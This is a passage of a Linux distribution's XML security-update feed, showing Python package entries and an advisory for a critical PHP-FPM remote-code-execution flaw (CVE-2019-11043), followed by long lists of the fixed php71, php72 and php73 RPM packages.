arch="i686"><filename>Packages/python27-devel-2.7.16-1.130.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.130.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.16-1.130.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.130.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.16-1.130.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.16" release="1.130.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.16-1.130.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.8" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.8-1.15.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.8" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.8-1.15.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.8" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.8-1.15.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.8" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.8-1.15.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.8" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.8-1.15.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.8" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.8-1.15.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.8" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.8-1.15.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.8" release="1.15.amzn1" epoch="0" 
arch="i686"><filename>Packages/python36-devel-3.6.8-1.15.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.8" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.8-1.15.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.8" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.8-1.15.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.8" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.8-1.15.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.8" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.8-1.15.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.8" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.8-1.15.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.8" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.8-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1315</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1315: critical priority package update for php71 php72 php73 php56</title><issued date="2019-10-31 20:13:00" /><updated date="2019-11-01 20:24:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11043:
In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.
99999:
CVE-2019-11043 php: underflow in env_path_info in fpm_main.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11043" title="" id="CVE-2019-11043" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php71-debuginfo" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.33" release="1.43.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php71-ldap-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" 
version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.33" release="1.43.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-pdo-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.33" release="1.43.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-opcache-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.33" release="1.43.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-process-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.24" 
release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package 
name="php72-dbg" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.24" release="1.18.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php72-gd-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.24" release="1.18.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-gd-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.24" release="1.18.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-odbc-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.24" release="1.18.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-recode-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" 
version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.11" release="1.21.amzn1" epoch="0" 
